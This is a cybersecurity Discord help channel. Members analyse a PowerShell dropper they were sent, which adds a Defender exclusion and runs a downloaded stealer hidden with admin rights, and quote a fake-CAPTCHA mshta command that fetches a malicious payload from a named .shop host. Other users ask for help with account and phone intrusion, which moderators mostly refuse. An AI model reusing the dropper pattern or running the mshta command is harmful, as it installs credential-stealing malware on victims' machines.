#👥・help-me

1 messages · Page 36 of 1

rugged mantle
#

ok yes id like to check out some books

vital robin
vital robin
rugged mantle
#

pdf

vital robin
#

ok

#

I zipped all 18 for some people in a friend's server

#

lemme switch laptops

rugged mantle
#

ok

vital robin
#

you really should use some kind of analysis tool on files like this that you have to download from an unverified source

#

it's just good opsec

#

and avoid unverified sources always if you can help it

#

I don't know why I can't locate any of these tools for that purpose

#

to be clear, not used this

#

but add this stuff to your toolbelt

rugged mantle
#

ok got it

vital robin
#

its like all the ones i had saved are dead

#

gallus

#

wepawet

#

jsunpack

rugged mantle
#

ok i might can find these

vital robin
#

maybe, i sure can't seem to for some reason

#

i guess some of these online tools disappear

#

I'll have to add you to send this I guess

toxic lantern
#

I like that, it’s nice to know we’re not all alone in this awful world

vital robin
vital robin
#

you changed you profile pic, wasn't sure if that was you or not

#

how's work?

toxic lantern
# vital robin hey J

Yes!! Sorry since before I only used discord for talking to friends I had my own picture but anonymity is important? 😭😭 imagine my ex is in this server lol I’d be killed sooner or later ☠️

#

Work is busy as always, only 8 more hours to go 😵‍💫

vital robin
#

You're not going anywhere 🙂

#

If you were in the US I'd probably ship a pistol to your nearest dealer for you to pick up and start practicing. I've got a few inexpensive extras that have been sitting in my inventory forever.

maiden violet
#

Yeah

lunar mantle
#

trying to get a software development job with felony

#

please help

tranquil moth
#

So… is there a way to use a command to perhaps get on the algorithm? 👀

zinc belfry
#

hello, I have a question about bug bounty. how can I get my first bounty?

vital robin
vital robin
lunar mantle
#

how dos a modern processor convert binary into code?

weary mirage
#

Hi all. I’m not very good at tech but I’ve lost my job and want to learn more about cybersecurity to be able to do better for the future while I work other gigs. Appreciate any tips and advice on a timeline for what skills to learn first and how to get certified (if that helps with employment? Idk , really). Thanks for any bits of help here. Hope you have a good day

crisp star
# lunar mantle how dos a modern processor convert binary into code?

That's actually a very good and complex question. But there are some sources that try to explain it.
https://www.youtube.com/watch?v=2y1IgW2T8bo

It's extremely easy to take the process of converting source code to machine code for granted. Every day, we write code, but do we understand how the code gets generated? How is the code stored? How does it get ran? By understanding the technical underpinning of these ideas, we can all become better developers.

In this video, I'd like to answer...

▶ Play video
chilly merlin
#

anyone know any lateral movement and pivoting practice room

chilly merlin
#

Network movement ig

#

one system to another

crisp star
#

On HTB you have the pro labs. But it does cost quite a bit

chilly merlin
#

💀

#

broke

crisp star
#
TryHackMe

Learn how to pivot through a network by compromising a public facing web machine and tunnelling your traffic to access other machines in Wreath's network. (Streak limitation only for non-subscribed users)

chilly merlin
#

Noice

crisp star
#

The man, the myth, the legend xct has also some AD stuff which likely involves lateral movement

chilly merlin
#

oo

glossy scaffold
#

help me in finding the site that is vulnerable to rpc

chilly merlin
#

no

glossy scaffold
#

ok

fleet nest
fleet nest
glossy scaffold
#

thanks for ur appreciation

#

but i really want to explore this

terse lagoon
#

Hello

deep elk
#

How do ibchange my username to orange?

stray mural
deep elk
tranquil forum
#

can you hack with metasploit win 11

#

i saw on eternalromance suport for win10 pro but don't know If using another exploit will work

chilly merlin
#

@deep elk there u go

#

i cant change color though

chilly merlin
#

cost?

sly spire
#

Oops sorry

#

Hey guys
Need your help
I need resources to study and practice for CNSP

sly spire
chilly merlin
#

💀

#

let me ckeck my sources

sly spire
#

Alr bet

chilly merlin
#

cant seem to find anything will drop in dms if i finf anything

sly spire
chilly merlin
naive kettle
#

Help me

chilly merlin
verbal oxide
#

How to use VScode in IOs?

dim stirrup
hexed zodiac
#

Hello guys how are you doing?

#

I am interested in learning software development

#

How should I go about it?

heavy bolt
#

I have a question there’s been speculation about the TikTok server being based in the US owned by Meta located in Utah now. How are people tracking the TikTok server ?

rustic pendant
#

Can anyone help me checking that does this method is real or fake or scam or phising or any type of hacking

hearty sonnet
#

I’m currently a college student studying A-Level Computer Science, Physics and Mathematics. I have recently taken onboard an Extended Project Qualification in Cyber Security. Through my research I have decided to do a project on Artificial Intelligence in Cyber Security, both as a threat and as support. I plan for one of my paragraphs to be about professional’s views. Because of this I have created a form and would like to ask as many people as possible to complete it. Thank you in advance!
https://forms.gle/st1qU7FFGMUotT387

crisp star
#

I'm going to check it out what it does

crisp star
# rustic pendant That's why I wasn't sure
$downloadUrl = "MALICIOUS URL SO I REMOVED IT"
$tempPath = "$env:LOCALAPPDATA\activator.exe"

function Add-WindowsDefenderExclusion {
    param (
        [string]$Path
    )
    try {
        Add-MpPreference -ExclusionPath $Path -ErrorAction SilentlyContinue
    } catch {
        # Игнорируем ошибки
    }
}

try {
    Invoke-WebRequest -Uri $downloadUrl -OutFile $tempPath -UseBasicParsing -ErrorAction Stop
    Add-WindowsDefenderExclusion -Path $tempPath
    Start-Process -FilePath $tempPath -WindowStyle Hidden -Verb RunAs -Wait
    Remove-Item $tempPath -Force
} catch {
    exit 1
}
#

LMAO

rustic pendant
crisp star
chilly merlin
#

it is pretty readable

crisp star
#

Looks like already to be a paassword stealer

chilly merlin
#

@crisp star question is does the system allow this , i mean placing in a temp path

rustic pendant
#

It's good that I didn't try it thanks guys

chilly merlin
#

and run .exe

rustic pendant
#

I was almost beleiving him

stray mural
chilly merlin
#

im thinking need to run with admin previleges

crisp star
rustic pendant
#

Yeah that makes sense it has all privileges to hack

crisp star
#

Ewww it's made with GO

rustic pendant
#

Can you tell me how to make a safe virtual environments to test this kind of things

crisp star
#

Inside VirtualBox or any other virtualisation software

crisp star
#

My god I'm amazed of the comments under this video 😂

rustic pendant
#

I think he does it by his other fake ID's because no one has reported of anything going wrong

crisp star
#

To be fair, I wouldn't be suprised if people don't notice that they've been hacked.

rustic pendant
#

That is also true

#

Someone did say that it only shows 403 error

chilly merlin
#

is the guy from this server? @rustic pendant

#

if so let us know

rustic pendant
#

In the script it is also written

rustic pendant
crisp star
#

Because the hacker is at least a bit smart and know that exposing malicious code to the public would be plain stupid.

rustic pendant
#

Again thanks you all guys for sparing some time on my matter

crisp star
#

I hate analyzing Go malware

crisp star
#

Apperantly It's Vidar family

woven anvil
crisp star
final kayak
#

Can someone tell me pros and cons of pentesting vs malware analysis, which you chose professionally and why??

#

Just your genuine experiences with both and which you preferred

odd ether
#

I'm having some issues with openvpn, it's coming back with fatal errors related to the config but after removing and reinstalling it still has the same issue. I'm using a Linux vbox if that changes anything. I've had a look at the plaintext file and that hasn't fixed anything

final kayak
#

@mild quartz

frail estuary
#

Hy guys I need help with getting login access to my old account

silent bobcat
#

Hi everyone, am new here and am happy to be here.

solemn grove
#

Hey I’m new here & just trying to get into my girl phone! Can anyone help me out??

vital robin
#

if you don't trust her break up with her, don't be a creep

maiden violet
silent bobcat
#

But I need help. Am a struggling guy from Cameroon , Africa. And I need help in getting an online job like remotely working from my home were I can get some genuine money online. Anyone?

solemn grove
#

Sorry

maiden violet
spiral notch
silent bobcat
spiral notch
silent bobcat
# spiral notch https://jobs.com

Thnks fr da site but they only accept us, uk and other European citizens. Do u hv any sites that I can do online surveys that pays well or , even watch videos like YouTube videos n get paid ?

spiral notch
#

no

#

those are mostly scams

viscid lagoon
#

waddup yall. Question:
CentOS + PI 4. Pros and Cons? Go

spiral notch
#

"Go"

who do u think we are, ur servants?

maiden violet
silent bobcat
viscid lagoon
viscid lagoon
#

havent gotten that far yet to determine so. they developed their own POE hats and chasis, so hardware is a no no. as for the repositories, im currently MITM a super admin

fossil dock
#

Hi y'all ...can y'all help me with Creating trading bot?

sick leaf
#

Hi, I'm 25 and a business owner in the hospitality industry.

I'm learning cybersecurity through TryHackMe then going eventually jumping on HacktheBox. Penetration Testing is the angle I want to take.

I think it's a good business to get into and only will get more demanding and I truly enjoying learning cybersecurity.

I've been playing overthewire to speed up the learning process.

Any guidance and/or advice to learning cybersecurity and the business-side of the space. Thank you

junior compass
#

hlo guys i'm new in cybersecurity and i like to learn hacking but don't know where to study from can u guys help me with this

chilly eagle
#

Start with tools like nmap Google dorking

#

For reconnaissance

sick leaf
chilly eagle
#

Virtual machines

verbal oxide
#

How can I make night owl like bot

sick leaf
#

I already installed a Vm with Kali on my Mac to use for Overthewire

verbal oxide
#

It's such a well written bot

chilly eagle
chilly merlin
#

ooh

chilly eagle
verbal oxide
#

Channel?

#

Name

chilly eagle
#

Crct me if I'm wrng

mighty sky
#

You’ll know about that chime stuff going on?

chilly merlin
#

nope all good

chilly eagle
#

Chime??

verbal oxide
#

@chilly eagle Channel name?

chilly eagle
mighty sky
#

Anybody know about that come stuff going on

verbal oxide
#

@chilly eagle recommendation ?

mighty sky
#

Kev Roberts

chilly eagle
mighty sky
#

What is it about

verbal oxide
#

Ok@chilly eagle

chilly eagle
#

freecodecamp might have a video based on that

mighty sky
#

Is that another site like this?

#

Or a user

chilly eagle
mighty sky
#

Yea I’m new to the underground

chilly eagle
#

oh they just teach stuff for free

mighty sky
#

Thank you

#

Where would I find like the scam and hack world

chilly eagle
mighty sky
#

You know what I mean curious minds

chilly eagle
verbal oxide
#

@chilly eagle do night owl reply?

chilly merlin
#

Same reaction

chilly eagle
mighty sky
#

Thanks

chilly eagle
mighty sky
#

Promise I’m not the law!!!

#

What’s night owl reply

verbal oxide
#

@chilly eagle red is dangerous 😭

chilly merlin
#

It doesn't

chilly eagle
mighty sky
#

O

verbal oxide
#

@chilly merlin ohhh 😲

#

Who is the creator?

chilly merlin
#

@chilly eagle u remember v_hb guy?

verbal oxide
#

Any idea

chilly merlin
#

Oni ig

chilly eagle
verbal oxide
#

It's a person

#

Got ban

#

I think

chilly merlin
#

Yesterday

verbal oxide
#

He was trolling red

#

Ig

chilly eagle
verbal oxide
#

Okie

jovial temple
#

hey does someone have a min to help me on forensics on a pdf

#

it's driving me mad for no reason ig

fleet nest
jovial temple
crisp star
jovial temple
#

i need to find the society that someone is working for from a pdf

#

i've tried the basics of searching key words in the document, looking through the details of the file for metadata but nothingg

fleet nest
lavish snow
#

How does someone can find information email, facebook, instagram, etc knowing the full name of that person ?
I need to find an old gf...

fleet nest
lavish snow
#

this old gf suffers from cancer and since 2021 it did not reply to anu messages...

fleet nest
round crater
#

Hey question is the secops group exam worth ?

void marten
#

Can anyone point me in the right direction of learning cybersecurity for free? And getting certified? Are there anything on that and app development, coding?

fleet nest
final kayak
#

@kvts okay so to be specific, I know most pentesting jobs are web related, but I don't really think I like web security all that much. And where I'm from, it's mostly web security. And also, I was learning HTB ctf before for a while around last year, but due to poor internet connection I had to put it on hold for a while. So I was looking into offline options in cyber, and I stumbled on RE. Ive made alot of research cause I'm paranoid as hell about focusing on the wrong thing(I'm that kinda person that just likes to focus on something early). Anyways, I did wanna start learning crackme. I've watched a few YouTube vids and it's all intruiging. But I need reassurance. I want someone that has done both to tell me what he/she has experienced, pros and cons, and basically creativity and enjoyability in both fields. Any aspect of pentesting too

#

@kvts

fleet nest
#

Pentesting is broader, mainly focused on web security, but involves a lot of different skills like network testing and discovering exploits. It can be rewarding, though if you're not into web stuff, it might feel repetitive. 🤔

Both have huge career potential

final kayak
#

Lemme just add also, it's cliche but I'm honestly afraid of automation. Low hanging pentesting can be automated, and I guess red teaming cannot. But, I don't know, I'm just being paranoid as usual. Too much reddit stories is killing me

fleet nest
# final kayak Lemme just add also, it's cliche but I'm honestly afraid of automation. Low hang...

I totally understand where you're coming from! It’s easy to get caught up in the fear that automation will take over cybersecurity fields, especially when you read stories on Reddit. Yes, low-hanging pentesting tasks (like simple vulnerability scanning or common exploits) can be automated, and tools like Burp Suite or automated scanners are commonly used in those cases. But red teaming is far less automated—it's not just about exploiting systems, it's about creative strategy, evading detection, and adapting in real-time to countermeasures.

What’s important is the human touch in cybersecurity: thinking on your feet, adapting to new situations, and outsmarting attackers, which is exactly where automation can’t replace you. Automation helps you work smarter, but problem-solving and creativity will always make you a valuable asset.

So, your paranoia? Totally normal—it shows you care! Just remember that advanced roles like red teaming, incident response, and reverse engineering require lots of human ingenuity, which is what will keep you relevant and secure in the industry! You’ve got this. 💪

final kayak
#

@666_master if I find pentesting repititive won't malware analysis still be repititive too?? If you follow thesame logic

fleet nest
# final kayak @666_master if I find pentesting repititive won't malware analysis still be repi...

I totally get where you’re coming from! It’s easy to think that both pentesting and malware analysis would feel repetitive, since you’re often following similar steps in both fields. But there’s a big difference in how that repetition plays out...
.
With pentesting, especially in web security, it’s true you’re scanning for vulnerabilities and testing exploits, but each system and target can offer new twists and challenges. You'll rarely deal with the exact same setup or environment, which means you're constantly adapting and thinking on your feet.
.
On the other hand, malware analysis might seem repetitive at first glance too, like reviewing files and code, but the beauty is no two pieces of malware are alike. Every new sample could have its own unique tricks and behavior to discover. You’re always figuring out the why and how behind the malware, which makes it feel less like a routine and more like solving a puzzle every time. 🔍
.
So, in a way, both fields will involve repetition, but malware analysis tends to feel more dynamic and exciting because you're constantly learning about new threats. At the end of the day, it’s about what kind of challenges you enjoy the most!!!!

final kayak
#

@666_master
So,to you,following your comment,malware analysis is less likely to keep me bored

final kayak
#

@666_master
Thank you. Honeslty. I needed this🙇🏾‍♂️

fleet nest
#

always here to help with what i can ma guy🫡 🙏

sleek wagon
#

Hey @fleet nest I have a question can I dm you?

thin prawn
#

Anybody know where I can download free books like the 7 seconds Tesla rituals

warped hare
#

Hello I’m new here

fleet nest
#

we can't assist with downloading copyrighted books illegally

thin prawn
#

Oh sorry

warped hare
#

Hey @fleet nest do you know a good website to watch new movies

thin prawn
warped hare
#

@thin prawn thanks

halcyon flame
#

Honestly I wouldn't be trusting sites for pirated content dropped from someone you don't know in a Discord you've just joined...

#

Asking for trouble

thin prawn
halcyon flame
#

🤷‍♂️ just saying, nothing against you, but it's good advice regardless.

thin prawn
#

I’ve just been here asking for a site where I can download a book I can use to better my life instead of being a scammer and no one would help me

halcyon flame
#

Is what it is. Not a server for sharing links related to piracy, but up to mods as to whether this is allowed I guess. I'll shut up again 🤣

shut heart
#

Hello im a beginner and id like help in finding ways to learn

shut heart
#

Thnk u

static tree
#

hey guys i wanna have a look around dll injecting but not really sure where to start.

lone fern
#

Please can someone help me I'm a bigginner using Kali

fleet nest
#

try this 1.Learn Basics of DLLs (Dynamic Link Libraries), 2.look for Tools for DLL Injection, could start by injecting a simple DLL into an existing application to see how it alters the behavior of that process. You could make a simple “hello world” DLL that shows a message box when injected other then that your on your own ma guy " REMEMBER NEVER USE maliciously"😊 🙏

static tree
halcyon flame
#

So, you want to have fun by making hacks for games?

#

Just get good at the game 😅

grave osprey
#

Need full software for my ZSC 160 card reader and writer please

halcyon flame
#

The manufacturers site has documents and downloads

#

It's ZCS also

#

Not ZSC 😉

#

You could literally paste what you asked in Google for the link

#

Seems blocked by Windows Defender mind.. so I'd be cautious.

#

By Chrome, rather

grave osprey
#

Have tried but all the software doesn’t give me the option full and access

halcyon flame
#

Sounds like a question for the manufacturer tbh, unless anyone has experience with that model here 🤷‍♂️

#

exes in the SDK etc are also being picked up by defender as malicious on inspection

grave osprey
#

The manufacturer did not include the software when I bought it from China and I contact another manufacturer who gave me a download site and I looked also on Google but it doesn’t enable all the function of the card reader that’s why I’m stocked

halcyon flame
#

Well, good luck I guess 😐

#

It includes an API guide over USB->serial comms

#

Damn, they don't include source for the libs they distribute?

#

That's pretty crap

karmic prairie
#

What are some devices that can work with 5ghz wifi? I mean the flipper zero cant, for kali linux you need a special wifi adapter…

woven anvil
halcyon flame
#

ALFA has decent dual band adapters

#

(which are compatible with injection, monitor, etc)

sturdy lance
#

Panda PAU09

halcyon flame
#

£100?! lol

#

Still expensive as adapters go at £50-60, but you get what you pay for

halcyon flame
# sturdy lance Panda PAU09

Out of interest, what's the PAU09 got over the ALFA? Panda uses the RT5572 chipset, the above Alfa the RTL8812

sturdy lance
#

Lightweight, plug and play on Linux

halcyon flame
#

The RTL8812 appears to be better performance wise

sturdy lance
#

Alfa are better

#

I just gave another option

halcyon flame
#

Fair enough, was just curious

sturdy lance
halcyon flame
#

Smaller, less performance, more expensive 0_0

#

Smaller, fair

sturdy lance
#

Hahahaha yea right

#

I would still prefer Alfa’s

#

Advanced and higher performance

halcyon flame
#

Still waiting for the ESP32C5 boards to come out

sturdy lance
#

Yeaa

halcyon flame
#

although that performance compared to full sized adapters of course would be much lower, but that kinda thing on such a small package, pretty cool.

#

Crap, I meant to call the UK distributor to see if I could get a sample today, fail

sturdy lance
#

I want to get a new adapter soon, but i have to ship it from the US

#

Not very patient…

halcyon flame
#

Hm.. there's a listing for the chipset on Alibaba @sturdy lance .. how much you wanna bet they're just C6 chips with a new label 😆

sturdy lance
#

lol wouldn’t be surprised if that’s the case 😂. Alibaba listings can be wild sometimes.

#

I am curious now 😂, did you find anything?

halcyon flame
#

The chip number lines up.. only recently posted, not many sold so looks like a recent posting

sturdy lance
#

Yup, definitely sounds suspicious

#

Alibaba shenanigans never fail to entertain

#

That day an Ad popped out, it was a UAV on Alibaba…

halcyon flame
#

https://www.youtube.com/watch?v=vah-11fBigY

#

Video smells a bit

#

I'm calling bullshit

rancid quartz
#

Need to find out who purchased a car from Copart.com with lot number and vin - can’t get a title lost it

Reach out if you can help - not for free

halcyon flame
#

See when / if reviews drop lol

#

Urgh, that doesn't sound very ethical @rancid quartz

rancid quartz
#

Copart won’t give me the persons info - I have no way of finding out

Paid $26k for the truck

halcyon flame
#

Why do you need the info

#

Either way.,. asking here is not the way

rancid quartz
#

Need to reach out to the person who got it n get a duplicate title

halcyon flame
#

Nobody will get that info for you

#

Your only option is the dealership, or obtaining a new title

rancid quartz
#

Title is in insurance’s name - person who sold me the truck didn’t give me the title and vanished

halcyon flame
#

Sorry, but that's a you problem 😦 Anyone who offers to give you that info will just be scamming you

#

Best thing to do, obtain a new title from the DMV

rancid quartz
#

Only option is part it out at this point

halcyon flame
#

I mean, if you've already bought it and the person who sold it has vanished and isn't responding, either they themselves didn't have the title, or they nicked the car and sold it on to you

#

Sounds like a life lesson 😐

#

No title no money

#

But yeah.. this isn't the server for this kinda thing tbh..

rancid quartz
#

My bad looking for help everywhere

They sold it to me as clean title - claim to be a dealer 15 days later I showed up to pick up to pick up plates and found out there was nobody there

turbid flume
halcyon flame
#

Surely you can apply for a new title if you have a bill of sale?

#

At least in UK there's a process.. a painful one, but a process all the same. Could be during the process without any reference to the original document the vehicle is discovered as stolen though.

#

Then you're in to handling stolen goods territory

rancid quartz
#

Not in US - no title you’re F

halcyon flame
#

I'm sure I've seen people obtain new titles without the original

#

Depends on state law I suppose

#

Anyway, I don't know, only going on what I've seen. Good luck

rancid quartz
#

Thnx

olive frigate
#

I need help

fleet nest
olive frigate
#

I wanna lean how to hack

olive frigate
#

Ty gng

spark lodge
#

Anyone experienced with OpenVAS? Having issues with my install where the NVT database will not update. I've let it sit for several hours.
Stuck with "Synchronization issue: Could not connect to scanner to get feed info"

glacial tulip
#

Hey guys I'm new to discord and I want to learn how to be a hacker

left sinew
#

Hey anyone, my friend got doxxed on this website and I don’t know what to do

fading dust
#

Hi everyone, I’m seeking guidance on bypassing restrictions and installing custom software on a locked JP6 tablet running version v8.14.12. The device is heavily restricted: I cannot access settings, perform a factory reset, disconnect from the externally controlled WiFi, or gain access through TalkBack. Additionally, USB debugging appears to be disabled, and the tablet enforces forced updates every 30 days.

I’m specifically looking for:

Methods to exploit recovery mode or vulnerabilities in the system to bypass these restrictions.

Tools or steps for flashing custom firmware via USB or SD card, even with USB restrictions.

Ways to disable or remove device management (MDM) to regain full control.

I’d like to learn how to approach this safely without bricking the device or losing future access. If anyone has experience with similar secure devices or can share resources or tutorials, I’d really appreciate it.

Thanks in advance for your help!

magic prawn
#

Hello y'all. I need help with getting my old Wattpad account back i made years ago. Can anyone figure out the password to my account so I can log in? I would really appreciate you. Here is my old account:

https://www.wattpad.com/user/Antwonfish

Dm me my password btw

#

I hope asking this isn't breaking the rules of the dos and don'ts

gloomy briar
#

Hello everyone, I’m a bit lost on what I’m supposed to be doing. I’ve done a few tryhackmes and hack the box but how do I get a real world scenario where I need to find the vulnerability starting from just the idea that they’re might be a vulnerability rather than a step by step tutorial on a predefined vulnerability? I understand the ethical considerations so I’m not really sure how to approach this or get the real world experience

halcyon flame
formal moss
#

How can I come up with 1200 fast so I don't lose my place. My credit sucks, I have nothing of value other than some Gucci sunglasses becsuse my ex has all my shit and I can't get kicked out and risk having to go back to him

halcyon flame
glacial tulip
#

How can I hack WiFi network?

halcyon flame
halcyon flame
formal moss
#

Ok sorry yall

left sinew
#

Can anyone help

magic prawn
halcyon flame
magic prawn
#

I tried that already

glacial tulip
#

He asked how hackers protect themselves from other hackers?

fading dust
halcyon flame
gloomy briar
halcyon flame
#

Sounds like an enterprise owned device

halcyon flame
#

That's as close - other than labs made to feel realistic - that you will get to a realistic environment

fading dust
gloomy briar
halcyon flame
#

You can search right

#

Research is a big part of the field of security. At least I think you can Google for what I mentioned?

gloomy briar
#

Fair point, thanks for your help 🙏🏾

halcyon flame
#

No worries 🙂

glacial tulip
#

I have a theory, it is true that in this discord, almost everyone is a hacker.

#

Whether you are one of the good guys or the bad guys.

halcyon flame
#

I don't think that's something that should be advised upon here. Do your own research.

#

We can't verify why it needs to be jailbreaked, or the scenario. Getting involved in jailbreaking a device that is meant to be used for inmates.. I for sure wouldn't want to get involved or connected to helping with that.

mystic wyvern
#

Guys is it safe to mine crypto on i5 rtx 2050 with 8 gigs of ram ?

halcyon flame
#

Safe? Sure

#

Worth while? probably not

mystic wyvern
fading dust
mystic wyvern
halcyon flame
#

@fading dust I'd recommend you remove all those spams across channels too

#

..apart from one, of course

#

Cross-posting like that is not looked highly upon

mystic wyvern
halcyon flame
#

I mean, mining on it for extended periods of time, yes it can damage it

#

Likely if you were to mine on it until it died, you would not have made enough to cover the cost of the GPU

mystic wyvern
#

I have a useless potato pc with i5 8 gigs of ram

#

Can I do it on that pc

#

Like if it gets damaged I wouldn’t have a problem

halcyon flame
#

You won't make any decent amount of money from mining with that GPU to be honest

#

It's just not worth the electricity cost

#

You wouldn't be anywhere close to breaking even

mystic wyvern
glacial tulip
#

I have a theory, it is true that in this discord, almost everyone is a hacker.

fading dust
# halcyon flame Understood, but I do not, sorry. It's curious and certainly would be an interest...

Not offended but let me satisfy your curiosity while enlightening you. You seem like one that likes to learn. Florida penal system has started far from rehabilitation. They've not only privatized prisons to profit from it spoils but they've managed to channel investing for the same ppl sending guys to prison and keeping them there. Judges, attorneys, legislature etc. they manager to manipulate the system to their benefit where physical mail has been digitized under the guide of stopping drug trafficking but the officers bring it in. The real reason was to partner with Jpay and force us to buy stamps to write home, or receive mail. As if that wasn't enough they jacked up costs of collect phone calls making it difficult for ppl to contact home. Not asking for pity but simply giving perspective. We've managed to topple their schemes by jailbreaking tablets and not spending money to see or communicate with our families & friends. But now this new update has us stuck! Some ppl still have their original tablets while many lost their during shakes. I'm looking to refine the original program or find an alternative then open the block back up🤷🏿‍♂️ Now u know...

halcyon flame
#

TLDR; lucky you have access to social at all to be honest, but I do feel for you

fading dust
halcyon flame
#

I think I'll stop commenting there really. All the best.

halcyon flame
fading dust
glacial tulip
#

Okay if one of you is a hacker, I challenge you to get information out of me.

fading dust
halcyon flame
cerulean cedar
#

can someone teach me about malicious code. i recently stumbled across one and it seems interesting. Its a .pub file with trojan and script (from virus total). and i really wanna check what script it has. can anyone guide me

halcyon flame
#

Got a link? Curious

#

(VT link, not the original file)

cerulean cedar
#

i thought the method this user used was pretty smart

#

it was a captcha page and it auto copied a text for me

#

it had instructions to press win+r, ctrl+v and run it

halcyon flame
cerulean cedar
#

seemed normal since it had message like:
Captcha no: 12387 blablabla has been verified

halcyon flame
#

Yeah.. control character to hide the remaining content

#

Why would you paste that in the run window anyway?

#

You formatted since then?

cerulean cedar
#

but upon scrolling i saw mshta command

#

and a link following it

#

no i havent done anything since it wasn't insta run or anything plus i didnt run it

#

i pasted it on run just because i was curious (also was aware)

#

and mshta command got me even more curious so i copied the link

#

ran it though virus total and came out clean it was a "shop" url

#

when i pasted the link, it silently downloaded a .pub file and when i ran that thing through virus total i found out it was trojan and had a script

#

😁 so i kinda wanna see the script but idk how to

odd lance
inland thistle
#

gimme proj ideas

sweet bluff
#

is this a virus?

#

ic ant show

#

but its like chinese and installed

#

it says microsoft corporation

halcyon flame
#

What?

#

Upload to VirusTotal and provide a link 🤷‍♂️

crisp star
#

Ah yes the good old fake captcha

cerulean cedar
#

i can send links?

#

let me see if i can get that captcha website

#

dont click it

#

mshta https://aroramof.shop/new-riii-1-b.pub | ✅ ''I am not a robot - reCAPTCHA Verification ID: 2165

#

this was the message pasted into the run command box

cerulean cedar
#

website is safe but the downloaded file isnt

crisp star
#

Ah sorry I meant to say that the website is down

cerulean cedar
#

oh i didnt know

halcyon flame
#

Well.. yeah it's malicious. Google the filename, and you'll see recent activity related to Lumma Stealer and recent changes in distribution

#

If you did run the command, you sure as hell should format, so yeah.. hope you didn't

tame tinsel
#

Hello pls I need recommendation

#

Is there any tool or website I can use to get unlimited referral in a telegram bot I want to check out something pls

molten patrol
#

Please can someone help with free fire hack?

thorn totem
#

hi can anyone help me i am locked out of my samsung galaxy s9 phone i forgot my pin

verbal oxide
#

U can't recover it from Google photos?

thorn totem
#

all my pics are on there and imporant messages i cant loose them

#

no i tried

verbal oxide
#

It would be save in ur gmail ID

thorn totem
#

i went in back door on my other phone one time long ago but i forgot how to do it

#

i am new here what u mean gmail id

thorn totem
#

i cant remmber samsng account info either

verbal oxide
#

Try this

thorn totem
#

okl thank you so much

verbal oxide
#

First try it

#

If It will work then come again to thanks me

sharp pilot
#

@thorn totem brother you can also download 'IMy phone' in your pc and can unlock you mobile with some easy steps

#

You can get the whole process on youtube

thorn totem
#

ok yeah the other one is only for unlock sim i need pin screen unlock thank you johnwalter

sharp pilot
#

Welcome @thorn totem

thorn totem
#

ok shinpi_dark_pease thanks

sharp pilot
#

@thorn totem *it's 'imyfone'

thorn totem
#

ok

crisp star
#

Except you want someone else cloning your SIM card

small compass
#

I have this older laptop that when it's supposedly off it will turn on or try to open the disk tray. Is there some smaller computer that could be infected and doing this?

maiden violet
#

is it a power button or bios/uefi issue

bold plaza
thorn totem
#

ok i didnt know you could clone a phone wow thanks for info

honest dirge
#

Is coding hard to learn

#

On Chromebook

verbal oxide
#

@crisp star ohhh

#

💀

scenic forum
#

How do i hack my hacked account, its a roblox account and i havent been able to get it back for around 6 years?

crisp star
cerulean cedar
hollow vault
#

Help

#

Plz

sturdy lance
woven anvil
# sturdy lance ?

I always imagine they are being swept up by a huge tornado or storm, and they just blip out a "help" before they are gone.

hollow vault
#

Yo I think I got someone on the job

#

Now too sure yet

chilly merlin
hollow vault
#

A long story a crazy insane story corruption extortion and trafficking

severe cloak
#

Hi guys who can pls tell me how to put a proxy on my Chromebook

golden tapir
#

How to start ma journey

chilly eagle
spring locust
#

Hello guys I have my interview in 2 days as a soc role. Ive a strong knowledge about Networking, Linux and as of SOC I am studying the CompTIA sec+ but it only seems theoretical knowledge. What more should I know as a fresher about SOC

#

Please help 🥺

narrow sphinx
#

Tired of working 2 jobs I need a money hack 😫

#

Is this a real hacker discord somebody bless my game 🙏🏾

dry parcel
#

Hello, i am noob. Can i ask, how can i hack any instagram account? Just password.

fallow dune
#

i need ideas for graduation project related to cybersecurity

verbal oxide
fallow dune
chilly eagle
verbal oxide
#

@chilly eagle I DM u check thatttt 😑

#

@fallow dune ohhh

#

😅😅😅

#

@fallow dune u can create boys

#

Bot*

#

💀

chilly merlin
#

this changed whole meaning

torpid shard
#

What are the easiest ways to make some money using your hacking skills ethically?

silver vault
#

I need help hacking my ex’s phone after she cheated on me and willing to pay .

halcyon flame
#

What would you do if you were to gain access to their phone

silver vault
#

I bought her that phone like a couple of weeks before I found out. I just want to delete everything on it or completely shut it down.

halcyon flame
#

You bought it for her

#

Take the L and move on

#

Now drop it, not the server for this kind of malicious subject

sonic atlas
#

I’ve been dying to hack the scammers that call lol. How can u get their IP from a call

chilly merlin
#

@sonic atlas @silver vault Just a friendly reminder that discussions or actions related to unethical activities, including unauthorized hacking or similar behavior, are not permitted in this space. We appreciate your cooperation in fostering a positive and ethical community.

We’d like to remind you that OwlSec upholds the highest standards of ethics and integrity in all discussions and activities. Engaging in or condoning vigilantism, unauthorized hacking, or any form of unethical behavior, such as seeking revenge on scammers, is strictly prohibited.

#

this should help

proud harbor
#

hello i am new to this whole cybersecurity thing i am in highschool and i am looking for a place to start

glad halo
sonic orbit
#

I'm new here

glad halo
#

nice to meet you

#

goodness I cannot spell today

sonic orbit
#

Nice to be here hopefully I can learn something new here

tidal orbit
#

Hi I’m barely scratching the surface of pen testing, computer science ect I was wondering if python was one of the best languages for the computer space ect

#

I’m interested in malware related things (ethically) just to experiment and develop anti virus and I want to know what language would be good for those

#

And just obviously pentesting ect

sage wedge
#

Does anyone have $3 of BTC or ETC to donate for my roobet and stake gambling habits 👀

#

Would be very appreciated I'm working on a gambling bot

sage wedge
#

I didn't ask for anything unethical

chilly eagle
sage wedge
#

It's 3 bucks but okay dad

chilly eagle
#

...

halcyon flame
#

@sturdy lance I folded and ordered a sample of that supposed C5 chip, which I am assuming is either just a C6, or a reproduction of the C5 chip by sketchy production chain in China. Will report back with the likely "yeah it's not real" response when it arrives and I wire it up 🤣

halcyon flame
#

Heard back from the UK distributor of the official chips also, and they unsurprisingly require a solid business case in order to ship out a sample

#

Not something I'm going to go to such lengths as to bullshit on, not when associated with HTB

sturdy lance
halcyon flame
#

It was only a few dollars, so very much doubt it's legit

chilly merlin
halcyon flame
#

but for a few dollars, I couldn't pass up the chance it's an actual repro of the C5 MCU

halcyon flame
#

It's out of stock on the producers site also, but still up on Alibana

#

More red flags lol

sturdy lance
#

Some kind of reproduction 🤣

tidal orbit
chilly eagle
#

C c++

chilly eagle
halcyon flame
#

Serial and product number doe sline up with the recently shipped dev kits mind

#

I won't keep my hopes up

chilly eagle
halcyon flame
#

Will need to dig out a dev board to hook it up to

sturdy lance
#

